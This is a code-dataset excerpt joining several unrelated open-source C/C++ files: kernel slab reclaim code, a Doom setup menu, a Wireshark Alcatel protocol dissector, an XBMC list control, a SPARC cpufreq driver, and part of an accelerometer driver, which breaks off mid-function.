* This functionality only exists to work around a rare issue where
* shrink_slabs() is repeatedly invoked by many cores causing the
* system to thrash.
*/
if ((spl_kmem_cache_reclaim & KMC_RECLAIM_ONCE) && sc->nr_to_scan)
return (SHRINK_STOP);
return (MAX(alloc, 0));
}
SPL_SHRINKER_CALLBACK_WRAPPER(spl_kmem_cache_generic_shrinker);
/*
* Call the registered reclaim function for a cache. Depending on how
* many and which objects are released it may simply repopulate the
* local magazine which will then need to age-out. Objects which cannot
* fit in the magazine we will be released back to their slabs which will
* also need to age out before being release. This is all just best
* effort and we do not want to thrash creating and destroying slabs.
*/
void
spl_kmem_cache_reap_now(spl_kmem_cache_t *skc, int count)
{
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));
atomic_inc(&skc->skc_ref);
/*
* Execute the registered reclaim callback if it exists. The
* per-cpu caches will be drained when is set KMC_EXPIRE_MEM.
*/
if (skc->skc_flags & KMC_SLAB) {
if (skc->skc_reclaim)
skc->skc_reclaim(skc->skc_private);
if (spl_kmem_cache_expire & KMC_EXPIRE_MEM)
kmem_cache_shrink(skc->skc_linux_cache);
goto out;
}
/*
* Prevent concurrent cache reaping when contended.
*/
if (test_and_set_bit(KMC_BIT_REAPING, &skc->skc_flags))
goto out;
/*
* When a reclaim function is available it may be invoked repeatedly
* until at least a single slab can be freed. This ensures that we
* do free memory back to the system. This helps minimize the chance
* of an OOM event when the bulk of memory is used by the slab.
*
* When free slabs are already available the reclaim callback will be
* skipped. Additionally, if no forward progress is detected despite
* a reclaim function the cache will be skipped to avoid deadlock.
*
* Longer term this would be the correct place to add the code which
* repacks the slabs in order minimize fragmentation.
*/
if (skc->skc_reclaim) {
uint64_t objects = UINT64_MAX;
int do_reclaim;
do {
spin_lock(&skc->skc_lock);
do_reclaim =
(skc->skc_slab_total > 0) &&
((skc->skc_slab_total-skc->skc_slab_alloc) == 0) &&
(skc->skc_obj_alloc < objects);
objects = skc->skc_obj_alloc;
spin_unlock(&skc->skc_lock);
if (do_reclaim)
skc->skc_reclaim(skc->skc_private);
} while (do_reclaim);
}
/* Reclaim from the magazine and free all now empty slabs. */
if (spl_kmem_cache_expire & KMC_EXPIRE_MEM) {
spl_kmem_magazine_t *skm;
unsigned long irq_flags;
local_irq_save(irq_flags);
skm = skc->skc_mag[smp_processor_id()];
spl_cache_flush(skc, skm, skm->skm_avail);
local_irq_restore(irq_flags);
}
spl_slab_reclaim(skc);
clear_bit_unlock(KMC_BIT_REAPING, &skc->skc_flags);
smp_mb__after_atomic();
wake_up_bit(&skc->skc_flags, KMC_BIT_REAPING);
out:
atomic_dec(&skc->skc_ref);
}
EXPORT_SYMBOL(spl_kmem_cache_reap_now);
/*
* Reap all free slabs from all registered caches.
*/
void
spl_kmem_reap(void)
{
struct shrink_control sc;
sc.nr_to_scan = KMC_REAP_CHUNK;
sc.gfp_mask = GFP_KERNEL;
(void) __spl_kmem_cache_generic_shrinker(NULL, &sc);
}
EXPORT_SYMBOL(spl_kmem_reap);
int
spl_kmem_cache_init(void)
{
init_rwsem(&spl_kmem_cache_sem);
INIT_LIST_HEAD(&spl_kmem_cache_list);
spl_kmem_cache_taskq = taskq_create("spl_kmem_cache",
spl_kmem_cache_kmem_threads, maxclsyspri, 1, 32, TASKQ_PREPOPULATE);
spl_register_shrinker(&spl_kmem_cache_shrinker);
return (0);
}
void
spl_kmem_cache_fini(void)
{
spl_unregister_shrinker(&spl_kmem_cache_shrinker);
taskq_destroy(spl_kmem_cache_taskq);
}
| gpl-2.0 |
Slipyx/Mint-Doom | src/setup/compatibility.c | 2 | 1442 | // Emacs style mode select -*- C++ -*-
//-----------------------------------------------------------------------------
//
// Copyright(C) 2006 Simon Howard
//
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
// 02111-1307, USA.
//
// Sound control menu
#include <stdlib.h>
#include "textscreen.h"
#include "compatibility.h"
int vanilla_savegame_limit = 1;
int vanilla_demo_limit = 1;
void CompatibilitySettings(void)
{
txt_window_t *window;
window = TXT_NewWindow("Compatibility");
TXT_AddWidgets(window,
TXT_NewCheckBox("Vanilla savegame limit",
&vanilla_savegame_limit),
TXT_NewCheckBox("Vanilla demo limit",
&vanilla_demo_limit),
NULL);
}
| gpl-2.0 |
arowser/wireshark-xcoin | epan/dissectors/packet-ua.c | 2 | 9053 | /* packet-ua.c
* Routines for UA/UDP (Universal Alcatel over UDP) packet dissection.
* Copyright 2012, Alcatel-Lucent Enterprise <lars.ruoff@alcatel-lucent.com>
*
* $Id$
*
* Wireshark - Network traffic analyzer
* By Gerald Combs <gerald@wireshark.org>
* Copyright 1998 Gerald Combs
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "config.h"
#include <glib.h>
#include "epan/packet.h"
#include "epan/prefs.h"
#include "epan/dissectors/packet-rtp.h"
#include "epan/dissectors/packet-rtcp.h"
#include "packet-uaudp.h"
void proto_register_ua_msg(void);
void proto_reg_handoff_ua_msg(void);
/*-----------------------------------------------------------------------------
GLOBALS
---------------------------------------------------------------------------*/
#if 0
static dissector_table_t ua_opcode_dissector_table;
#endif
static int proto_ua_msg = -1;
static gint ett_ua_msg = -1;
static gboolean setup_conversations_enabled = TRUE;
static dissector_handle_t noe_handle;
static dissector_handle_t ua3g_handle;
static void uadecode(e_ua_direction direction,
proto_tree *tree,
packet_info *pinfo,
tvbuff_t *tvb,
gint offset,
gint opcode,
gint length)
{
switch (opcode & 0x7f) /* suppression of the CP bit */
{
case 0x15:
case 0x16:
{
call_dissector(noe_handle,
tvb_new_subset(tvb, offset, length, length),
pinfo,
tree);
break;
}
case 0x00:
case 0x01:
case 0x02:
case 0x03:
case 0x04:
case 0x05:
case 0x06:
case 0x07: /* Only UA NOE */
case 0x08: /* Only UA NOE */
case 0x09:
case 0x0A:
case 0x0B:
case 0x0C:
case 0x0D:
case 0x0E:
case 0x0F:
case 0x11:
case 0x12:
case 0x13:
case 0x14:
case 0x17:
case 0x18:
case 0x1F: /* case 0x9F */
case 0x20:
case 0x21:
case 0x22:
case 0x23:
case 0x24: /* Only IP NOE */
case 0x25: /* Only IP NOE */
case 0x26:
case 0x27:
case 0x28:
case 0x29:
case 0x2A:
case 0x2B: /* Only UA NOE */
case 0x2C:
case 0x2D:
case 0x2E:
case 0x30:
case 0x31:
case 0x32: /* Only UA NOE */
case 0x33:
case 0x35:
case 0x36: /* IP Phone */
case 0x38:
case 0x39:
case 0x3A:
case 0x3B:
case 0x3C:
case 0x3D:
case 0x3E:
case 0x3F:
case 0x40:
case 0x41:
case 0x42:
case 0x43:
case 0x44:
case 0x45:
case 0x46:
case 0x47:
case 0x48:
case 0x49:
case 0x4A:
case 0x4B:
case 0x4C:
case 0x4D:
case 0x4E:
case 0x4F:
case 0x50: /* Only UA NOE */
{
call_dissector_with_data(ua3g_handle,
tvb_new_subset(tvb, offset, length, length),
pinfo,
tree, &direction);
break;
}
default:
{
/* add text to the frame "INFO" column */
col_append_str(pinfo->cinfo, COL_INFO, " - UA3G Message ERR: Opcode Unknown");
proto_tree_add_text(tree,
tvb,
offset,
length,
"Opcode Unknown 0x%02x",
tvb_get_guint8(tvb, (offset + 2)));
break;
}
}
}
/*-----------------------------------------------------------------------------
UA DISSECTOR
---------------------------------------------------------------------------*/
static void _dissect_ua_msg(tvbuff_t *tvb,
packet_info *pinfo,
proto_tree *tree,
e_ua_direction direction)
{
gint offset = 0;
proto_item *ua_msg_item;
proto_tree *ua_msg_tree;
ua_msg_item = proto_tree_add_protocol_format(tree, proto_ua_msg, tvb, 0, -1,
"Universal Alcatel Protocol, %s",
((direction == SYS_TO_TERM) ?
"System -> Terminal" : "Terminal -> System"));
ua_msg_tree = proto_item_add_subtree(ua_msg_item, ett_ua_msg);
while (tvb_offset_exists(tvb, offset))
{
gint length;
gint opcode;
length = tvb_get_letohs(tvb, offset) + 2;
opcode = tvb_get_guint8(tvb, offset+2);
/* RTP/RTCP conversation setup */
if (setup_conversations_enabled && (opcode==0x13) && (tvb_get_guint8(tvb, offset+3)==0x01))
{
address remote_rtp_addr;
guint32 remote_rtp_port;
gint suboffset;
remote_rtp_addr.data = NULL;
remote_rtp_port = 0;
/* StartRTP */
suboffset = offset + 5;
while (suboffset < offset+length)
{
switch (tvb_get_guint8(tvb, suboffset))
{
case 0x00: /* local port */
{
/*local_rtp_port = tvb_get_ntohs(tvb, suboffset+2);*/
break;
}
case 0x01: /* remote IP */
{
remote_rtp_addr.type = AT_IPv4;
remote_rtp_addr.len = 4;
remote_rtp_addr.data = tvb_get_ptr(tvb, suboffset+2, 4);
break;
}
case 0x02: /* remote port */
{
remote_rtp_port = tvb_get_ntohs(tvb, suboffset+2);
break;
}
}
suboffset += tvb_get_guint8(tvb, suboffset+1) + 2;
}
if ((remote_rtp_addr.data != NULL) && (remote_rtp_port != 0))
{
rtp_add_address(pinfo, &remote_rtp_addr, remote_rtp_port, 0,
"UA", pinfo->fd->num, 0, NULL);
rtcp_add_address(pinfo, &remote_rtp_addr, remote_rtp_port+1, 0,
"UA", pinfo->fd->num);
}
}
uadecode(direction, ua_msg_tree, pinfo, tvb, offset, opcode, length);
offset += length;
}
}
static void dissect_ua_sys_to_term(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree)
{
_dissect_ua_msg(tvb, pinfo, tree, SYS_TO_TERM);
}
static void dissect_ua_term_to_sys(tvbuff_t *tvb, packet_info *pinfo, proto_tree *tree)
{
_dissect_ua_msg(tvb, pinfo, tree, TERM_TO_SYS);
}
/*-----------------------------------------------------------------------------
DISSECTORS REGISTRATION FUNCTIONS
---------------------------------------------------------------------------*/
void proto_register_ua_msg(void)
{
module_t *ua_msg_module;
static gint *ett[] =
{
&ett_ua_msg,
};
/* UA dissector registration */
proto_ua_msg = proto_register_protocol("Universal Alcatel Protocol", "UA", "ua");
register_dissector("ua_sys_to_term", dissect_ua_sys_to_term, proto_ua_msg);
register_dissector("ua_term_to_sys", dissect_ua_term_to_sys, proto_ua_msg);
/* Common subtree array registration */
proto_register_subtree_array(ett, array_length(ett));
/* Register preferences */
ua_msg_module = prefs_register_protocol(proto_ua_msg, NULL);
prefs_register_bool_preference(ua_msg_module, "setup_conversations",
"Setup RTP/RTCP conversations on Start RTP",
"Setup RTP/RTCP conversations when parsing Start RTP messages",
&setup_conversations_enabled);
}
void proto_reg_handoff_ua_msg(void)
{
#if 0 /* Future */
dissector_handle_t handle_ua_msg;
/* hooking of UA on UAUDP */
/* XXX: The following is NG since the same 'pattern' is added twice */
handle_ua_msg = find_dissector("ua_sys_to_term");
dissector_add_uint("uaudp.opcode", UAUDP_DATA, handle_ua_msg);
handle_ua_msg = find_dissector("ua_term_to_sys");
dissector_add_uint("uaudp.opcode", UAUDP_DATA, handle_ua_msg);
/* For hooking dissectors to UA */
ua_opcode_dissector_table =
register_dissector_table("ua.opcode",
"ua.opcode",
FT_UINT8,
BASE_HEX);
#endif
noe_handle = find_dissector("noe");
ua3g_handle = find_dissector("ua3g");
}
| gpl-2.0 |
bkury/OpenPHT | xbmc/guilib/GUIListContainer.cpp | 2 | 9302 | /*
* Copyright (C) 2005-2012 Team XBMC
* http://www.xbmc.org
*
* This Program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This Program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with XBMC; see the file COPYING. If not, see
* <http://www.gnu.org/licenses/>.
*
*/
#include "system.h"
#include "GUIListContainer.h"
#include "GUIListItem.h"
#include "Key.h"
CGUIListContainer::CGUIListContainer(int parentID, int controlID, float posX, float posY, float width, float height, ORIENTATION orientation, const CScroller& scroller, int preloadItems)
: CGUIBaseContainer(parentID, controlID, posX, posY, width, height, orientation, scroller, preloadItems)
{
ControlType = GUICONTAINER_LIST;
m_type = VIEW_TYPE_LIST;
}
CGUIListContainer::~CGUIListContainer(void)
{
}
bool CGUIListContainer::OnAction(const CAction &action)
{
switch (action.GetID())
{
case ACTION_PAGE_UP:
{
if (GetOffset() == 0)
{ // already on the first page, so move to the first item
SetCursor(0);
}
else
{ // scroll up to the previous page
Scroll( -m_itemsPerPage);
}
return true;
}
break;
case ACTION_PAGE_DOWN:
{
if (GetOffset() == (int)m_items.size() - m_itemsPerPage || (int)m_items.size() < m_itemsPerPage)
{ // already at the last page, so move to the last item.
SetCursor(m_items.size() - GetOffset() - 1);
}
else
{ // scroll down to the next page
Scroll(m_itemsPerPage);
}
return true;
}
break;
// smooth scrolling (for analog controls)
case ACTION_SCROLL_UP:
{
m_analogScrollCount += action.GetAmount() * action.GetAmount();
bool handled = false;
while (m_analogScrollCount > 0.4)
{
handled = true;
m_analogScrollCount -= 0.4f;
if (GetOffset() > 0 && GetCursor() <= m_itemsPerPage / 2)
{
Scroll(-1);
}
else if (GetCursor() > 0)
{
SetCursor(GetCursor() - 1);
}
}
return handled;
}
break;
case ACTION_SCROLL_DOWN:
{
m_analogScrollCount += action.GetAmount() * action.GetAmount();
bool handled = false;
while (m_analogScrollCount > 0.4)
{
handled = true;
m_analogScrollCount -= 0.4f;
if (GetOffset() + m_itemsPerPage < (int)m_items.size() && GetCursor() >= m_itemsPerPage / 2)
{
Scroll(1);
}
else if (GetCursor() < m_itemsPerPage - 1 && GetOffset() + GetCursor() < (int)m_items.size() - 1)
{
SetCursor(GetCursor() + 1);
}
}
return handled;
}
break;
}
return CGUIBaseContainer::OnAction(action);
}
bool CGUIListContainer::OnMessage(CGUIMessage& message)
{
if (message.GetControlId() == GetID() )
{
if (message.GetMessage() == GUI_MSG_LABEL_RESET)
{
SetCursor(0);
SetOffset(0);
m_scroller.SetValue(0);
}
}
return CGUIBaseContainer::OnMessage(message);
}
bool CGUIListContainer::MoveUp(bool wrapAround)
{
if (GetCursor() > 0)
{
SetCursor(GetCursor() - 1);
}
else if (GetCursor() == 0 && GetOffset())
{
ScrollToOffset(GetOffset() - 1);
}
else if (wrapAround)
{
if (!m_items.empty())
{ // move 2 last item in list, and set our container moving up
int offset = m_items.size() - m_itemsPerPage;
if (offset < 0) offset = 0;
SetCursor(m_items.size() - offset - 1);
ScrollToOffset(offset);
SetContainerMoving(-1);
}
}
else
return false;
return true;
}
bool CGUIListContainer::MoveDown(bool wrapAround)
{
if (GetOffset() + GetCursor() + 1 < (int)m_items.size())
{
if (GetCursor() + 1 < m_itemsPerPage)
{
SetCursor(GetCursor() + 1);
}
else
{
ScrollToOffset(GetOffset() + 1);
}
}
else if(wrapAround)
{ // move first item in list, and set our container moving in the "down" direction
SetCursor(0);
ScrollToOffset(0);
SetContainerMoving(1);
}
else
return false;
return true;
}
// scrolls the said amount
void CGUIListContainer::Scroll(int amount)
{
// increase or decrease the offset
int offset = GetOffset() + amount;
if (offset > (int)m_items.size() - m_itemsPerPage)
{
offset = m_items.size() - m_itemsPerPage;
}
if (offset < 0) offset = 0;
ScrollToOffset(offset);
}
void CGUIListContainer::ValidateOffset()
{
if (!m_layout) return;
// first thing is we check the range of our offset
// don't validate offset if we are scrolling in case the tween image exceed <0, 1> range
int minOffset, maxOffset;
GetOffsetRange(minOffset, maxOffset);
if (GetOffset() > maxOffset || (!m_scroller.IsScrolling() && m_scroller.GetValue() > maxOffset * m_layout->Size(m_orientation)))
{
SetOffset(std::max(0, maxOffset));
m_scroller.SetValue(GetOffset() * m_layout->Size(m_orientation));
}
if (GetOffset() < 0 || (!m_scroller.IsScrolling() && m_scroller.GetValue() < 0))
{
SetOffset(0);
m_scroller.SetValue(0);
}
}
void CGUIListContainer::SetCursor(int cursor)
{
if (cursor > m_itemsPerPage - 1) cursor = m_itemsPerPage - 1;
if (cursor < 0) cursor = 0;
if (!m_wasReset)
SetContainerMoving(cursor - GetCursor());
CGUIBaseContainer::SetCursor(cursor);
}
void CGUIListContainer::SelectItem(int item)
{
// Check that our offset is valid
ValidateOffset();
// only select an item if it's in a valid range
if (item >= 0 && item < (int)m_items.size())
{
// Select the item requested
if (item >= GetOffset() && item < GetOffset() + m_itemsPerPage)
{ // the item is on the current page, so don't change it.
SetCursor(item - GetOffset());
}
else if (item < GetOffset())
{ // item is on a previous page - make it the first item on the page
SetCursor(0);
ScrollToOffset(item);
}
else // (item >= GetOffset()+m_itemsPerPage)
{ // item is on a later page - make it the last item on the page
SetCursor(m_itemsPerPage - 1);
ScrollToOffset(item - GetCursor());
}
}
}
int CGUIListContainer::GetCursorFromPoint(const CPoint &point, CPoint *itemPoint) const
{
if (!m_focusedLayout || !m_layout)
return -1;
int row = 0;
float pos = (m_orientation == VERTICAL) ? point.y : point.x;
while (row < m_itemsPerPage + 1) // 1 more to ensure we get the (possible) half item at the end.
{
const CGUIListItemLayout *layout = (row == GetCursor()) ? m_focusedLayout : m_layout;
if (pos < layout->Size(m_orientation) && row + GetOffset() < (int)m_items.size())
{ // found correct "row" -> check horizontal
if (!InsideLayout(layout, point))
return -1;
if (itemPoint)
*itemPoint = m_orientation == VERTICAL ? CPoint(point.x, pos) : CPoint(pos, point.y);
return row;
}
row++;
pos -= layout->Size(m_orientation);
}
return -1;
}
bool CGUIListContainer::SelectItemFromPoint(const CPoint &point)
{
CPoint itemPoint;
int row = GetCursorFromPoint(point, &itemPoint);
if (row < 0)
return false;
SetCursor(row);
CGUIListItemLayout *focusedLayout = GetFocusedLayout();
if (focusedLayout)
focusedLayout->SelectItemFromPoint(itemPoint);
return true;
}
//#ifdef PRE_SKIN_VERSION_9_10_COMPATIBILITY
CGUIListContainer::CGUIListContainer(int parentID, int controlID, float posX, float posY, float width, float height,
const CLabelInfo& labelInfo, const CLabelInfo& labelInfo2,
const CTextureInfo& textureButton, const CTextureInfo& textureButtonFocus,
float textureHeight, float itemWidth, float itemHeight, float spaceBetweenItems)
: CGUIBaseContainer(parentID, controlID, posX, posY, width, height, VERTICAL, 200, 0)
{
CGUIListItemLayout layout;
layout.CreateListControlLayouts(width, textureHeight + spaceBetweenItems, false, labelInfo, labelInfo2, textureButton, textureButtonFocus, textureHeight, itemWidth, itemHeight, "", "");
m_layouts.push_back(layout);
CStdString condition;
condition.Format("control.hasfocus(%i)", controlID);
CStdString condition2 = "!" + condition;
CGUIListItemLayout focusLayout;
focusLayout.CreateListControlLayouts(width, textureHeight + spaceBetweenItems, true, labelInfo, labelInfo2, textureButton, textureButtonFocus, textureHeight, itemWidth, itemHeight, condition2, condition);
m_focusedLayouts.push_back(focusLayout);
m_height = floor(m_height / (textureHeight + spaceBetweenItems)) * (textureHeight + spaceBetweenItems);
ControlType = GUICONTAINER_LIST;
}
//#endif
bool CGUIListContainer::HasNextPage() const
{
return (GetOffset() != (int)m_items.size() - m_itemsPerPage && (int)m_items.size() >= m_itemsPerPage);
}
bool CGUIListContainer::HasPreviousPage() const
{
return (GetOffset() > 0);
}
| gpl-2.0 |
punitvara/linux-1 | drivers/cpufreq/sparc-us3-cpufreq.c | 1794 | 5313 | /* us3_cpufreq.c: UltraSPARC-III cpu frequency support
*
* Copyright (C) 2003 David S. Miller (davem@redhat.com)
*
* Many thanks to Dominik Brodowski for fixing up the cpufreq
* infrastructure in order to make this driver easier to implement.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/smp.h>
#include <linux/cpufreq.h>
#include <linux/threads.h>
#include <linux/slab.h>
#include <linux/init.h>
#include <asm/head.h>
#include <asm/timer.h>
static struct cpufreq_driver *cpufreq_us3_driver;
struct us3_freq_percpu_info {
struct cpufreq_frequency_table table[4];
};
/* Indexed by cpu number. */
static struct us3_freq_percpu_info *us3_freq_table;
/* UltraSPARC-III has three dividers: 1, 2, and 32. These are controlled
* in the Safari config register.
*/
#define SAFARI_CFG_DIV_1 0x0000000000000000UL
#define SAFARI_CFG_DIV_2 0x0000000040000000UL
#define SAFARI_CFG_DIV_32 0x0000000080000000UL
#define SAFARI_CFG_DIV_MASK 0x00000000C0000000UL
static unsigned long read_safari_cfg(void)
{
unsigned long ret;
__asm__ __volatile__("ldxa [%%g0] %1, %0"
: "=&r" (ret)
: "i" (ASI_SAFARI_CONFIG));
return ret;
}
static void write_safari_cfg(unsigned long val)
{
__asm__ __volatile__("stxa %0, [%%g0] %1\n\t"
"membar #Sync"
: /* no outputs */
: "r" (val), "i" (ASI_SAFARI_CONFIG)
: "memory");
}
static unsigned long get_current_freq(unsigned int cpu, unsigned long safari_cfg)
{
unsigned long clock_tick = sparc64_get_clock_tick(cpu) / 1000;
unsigned long ret;
switch (safari_cfg & SAFARI_CFG_DIV_MASK) {
case SAFARI_CFG_DIV_1:
ret = clock_tick / 1;
break;
case SAFARI_CFG_DIV_2:
ret = clock_tick / 2;
break;
case SAFARI_CFG_DIV_32:
ret = clock_tick / 32;
break;
default:
BUG();
}
return ret;
}
static unsigned int us3_freq_get(unsigned int cpu)
{
cpumask_t cpus_allowed;
unsigned long reg;
unsigned int ret;
cpumask_copy(&cpus_allowed, tsk_cpus_allowed(current));
set_cpus_allowed_ptr(current, cpumask_of(cpu));
reg = read_safari_cfg();
ret = get_current_freq(cpu, reg);
set_cpus_allowed_ptr(current, &cpus_allowed);
return ret;
}
static int us3_freq_target(struct cpufreq_policy *policy, unsigned int index)
{
unsigned int cpu = policy->cpu;
unsigned long new_bits, new_freq, reg;
cpumask_t cpus_allowed;
cpumask_copy(&cpus_allowed, tsk_cpus_allowed(current));
set_cpus_allowed_ptr(current, cpumask_of(cpu));
new_freq = sparc64_get_clock_tick(cpu) / 1000;
switch (index) {
case 0:
new_bits = SAFARI_CFG_DIV_1;
new_freq /= 1;
break;
case 1:
new_bits = SAFARI_CFG_DIV_2;
new_freq /= 2;
break;
case 2:
new_bits = SAFARI_CFG_DIV_32;
new_freq /= 32;
break;
default:
BUG();
}
reg = read_safari_cfg();
reg &= ~SAFARI_CFG_DIV_MASK;
reg |= new_bits;
write_safari_cfg(reg);
set_cpus_allowed_ptr(current, &cpus_allowed);
return 0;
}
static int __init us3_freq_cpu_init(struct cpufreq_policy *policy)
{
unsigned int cpu = policy->cpu;
unsigned long clock_tick = sparc64_get_clock_tick(cpu) / 1000;
struct cpufreq_frequency_table *table =
&us3_freq_table[cpu].table[0];
table[0].driver_data = 0;
table[0].frequency = clock_tick / 1;
table[1].driver_data = 1;
table[1].frequency = clock_tick / 2;
table[2].driver_data = 2;
table[2].frequency = clock_tick / 32;
table[3].driver_data = 0;
table[3].frequency = CPUFREQ_TABLE_END;
policy->cpuinfo.transition_latency = 0;
policy->cur = clock_tick;
return cpufreq_table_validate_and_show(policy, table);
}
static int us3_freq_cpu_exit(struct cpufreq_policy *policy)
{
if (cpufreq_us3_driver)
us3_freq_target(policy, 0);
return 0;
}
static int __init us3_freq_init(void)
{
unsigned long manuf, impl, ver;
int ret;
if (tlb_type != cheetah && tlb_type != cheetah_plus)
return -ENODEV;
__asm__("rdpr %%ver, %0" : "=r" (ver));
manuf = ((ver >> 48) & 0xffff);
impl = ((ver >> 32) & 0xffff);
if (manuf == CHEETAH_MANUF &&
(impl == CHEETAH_IMPL ||
impl == CHEETAH_PLUS_IMPL ||
impl == JAGUAR_IMPL ||
impl == PANTHER_IMPL)) {
struct cpufreq_driver *driver;
ret = -ENOMEM;
driver = kzalloc(sizeof(*driver), GFP_KERNEL);
if (!driver)
goto err_out;
us3_freq_table = kzalloc((NR_CPUS * sizeof(*us3_freq_table)),
GFP_KERNEL);
if (!us3_freq_table)
goto err_out;
driver->init = us3_freq_cpu_init;
driver->verify = cpufreq_generic_frequency_table_verify;
driver->target_index = us3_freq_target;
driver->get = us3_freq_get;
driver->exit = us3_freq_cpu_exit;
strcpy(driver->name, "UltraSPARC-III");
cpufreq_us3_driver = driver;
ret = cpufreq_register_driver(driver);
if (ret)
goto err_out;
return 0;
err_out:
if (driver) {
kfree(driver);
cpufreq_us3_driver = NULL;
}
kfree(us3_freq_table);
us3_freq_table = NULL;
return ret;
}
return -ENODEV;
}
static void __exit us3_freq_exit(void)
{
if (cpufreq_us3_driver) {
cpufreq_unregister_driver(cpufreq_us3_driver);
kfree(cpufreq_us3_driver);
cpufreq_us3_driver = NULL;
kfree(us3_freq_table);
us3_freq_table = NULL;
}
}
MODULE_AUTHOR("David S. Miller <davem@redhat.com>");
MODULE_DESCRIPTION("cpufreq driver for UltraSPARC-III");
MODULE_LICENSE("GPL");
module_init(us3_freq_init);
module_exit(us3_freq_exit);
| gpl-2.0 |
Zaphod-Beeblebrox/kernel_rockchip_rk3188 | drivers/staging/iio/accel/kxsd9.c | 2306 | 9012 | /*
* kxsd9.c simple support for the Kionix KXSD9 3D
* accelerometer.
*
* Copyright (c) 2008-2009 Jonathan Cameron <jic23@cam.ac.uk>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* The i2c interface is very similar, so shouldn't be a problem once
* I have a suitable wire made up.
*
* TODO: Support the motion detector
* Uses register address incrementing so could have a
* heavily optimized ring buffer access function.
*/
#include <linux/device.h>
#include <linux/kernel.h>
#include <linux/spi/spi.h>
#include <linux/sysfs.h>
#include <linux/slab.h>
#include "../iio.h"
#include "../sysfs.h"
#include "../adc/adc.h"
#include "accel.h"
#define KXSD9_REG_X 0x00
#define KXSD9_REG_Y 0x02
#define KXSD9_REG_Z 0x04
#define KXSD9_REG_AUX 0x06
#define KXSD9_REG_RESET 0x0a
#define KXSD9_REG_CTRL_C 0x0c
#define KXSD9_FS_8 0x00
#define KXSD9_FS_6 0x01
#define KXSD9_FS_4 0x02
#define KXSD9_FS_2 0x03
#define KXSD9_FS_MASK 0x03
#define KXSD9_REG_CTRL_B 0x0d
#define KXSD9_REG_CTRL_A 0x0e
#define KXSD9_READ(a) (0x80 | (a))
#define KXSD9_WRITE(a) (a)
#define KXSD9_SCALE_2G "0.011978"
#define KXSD9_SCALE_4G "0.023927"
#define KXSD9_SCALE_6G "0.035934"
#define KXSD9_SCALE_8G "0.047853"
#define KXSD9_STATE_RX_SIZE 2
#define KXSD9_STATE_TX_SIZE 4
/**
* struct kxsd9_state - device related storage
* @buf_lock: protect the rx and tx buffers.
* @indio_dev: associated industrial IO device
* @us: spi device
* @rx: single rx buffer storage
* @tx: single tx buffer storage
**/
struct kxsd9_state {
struct mutex buf_lock;
struct iio_dev *indio_dev;
struct spi_device *us;
u8 *rx;
u8 *tx;
};
/* This may want to move to mili g to allow for non integer ranges */
static ssize_t kxsd9_read_scale(struct device *dev,
struct device_attribute *attr,
char *buf)
{
int ret;
ssize_t len = 0;
struct iio_dev *indio_dev = dev_get_drvdata(dev);
struct kxsd9_state *st = indio_dev->dev_data;
struct spi_transfer xfer = {
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
.tx_buf = st->tx,
.rx_buf = st->rx,
};
struct spi_message msg;
mutex_lock(&st->buf_lock);
st->tx[0] = KXSD9_READ(KXSD9_REG_CTRL_C);
st->tx[1] = 0;
spi_message_init(&msg);
spi_message_add_tail(&xfer, &msg);
ret = spi_sync(st->us, &msg);
if (ret)
goto error_ret;
switch (st->rx[1] & KXSD9_FS_MASK) {
case KXSD9_FS_8:
len += sprintf(buf, "%s\n", KXSD9_SCALE_8G);
break;
case KXSD9_FS_6:
len += sprintf(buf, "%s\n", KXSD9_SCALE_6G);
break;
case KXSD9_FS_4:
len += sprintf(buf, "%s\n", KXSD9_SCALE_4G);
break;
case KXSD9_FS_2:
len += sprintf(buf, "%s\n", KXSD9_SCALE_2G);
break;
}
error_ret:
mutex_unlock(&st->buf_lock);
return ret ? ret : len;
}
static ssize_t kxsd9_write_scale(struct device *dev,
struct device_attribute *attr,
const char *buf,
size_t len)
{
struct spi_message msg;
int ret;
struct iio_dev *indio_dev = dev_get_drvdata(dev);
struct kxsd9_state *st = indio_dev->dev_data;
u8 val;
struct spi_transfer xfers[] = {
{
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
.tx_buf = st->tx,
.rx_buf = st->rx,
}, {
.bits_per_word = 8,
.len = 2,
.cs_change = 1,
.tx_buf = st->tx,
},
};
if (!strncmp(buf, KXSD9_SCALE_8G,
strlen(buf) < strlen(KXSD9_SCALE_8G)
? strlen(buf) : strlen(KXSD9_SCALE_8G)))
val = KXSD9_FS_8;
else if (!strncmp(buf, KXSD9_SCALE_6G,
strlen(buf) < strlen(KXSD9_SCALE_6G)
? strlen(buf) : strlen(KXSD9_SCALE_6G)))
val = KXSD9_FS_6;
else if (!strncmp(buf, KXSD9_SCALE_4G,
strlen(buf) < strlen(KXSD9_SCALE_4G)
? strlen(buf) : strlen(KXSD9_SCALE_4G)))
val = KXSD9_FS_4;
else if (!strncmp(buf, KXSD9_SCALE_2G,
strlen(buf) < strlen(KXSD9_SCALE_2G)
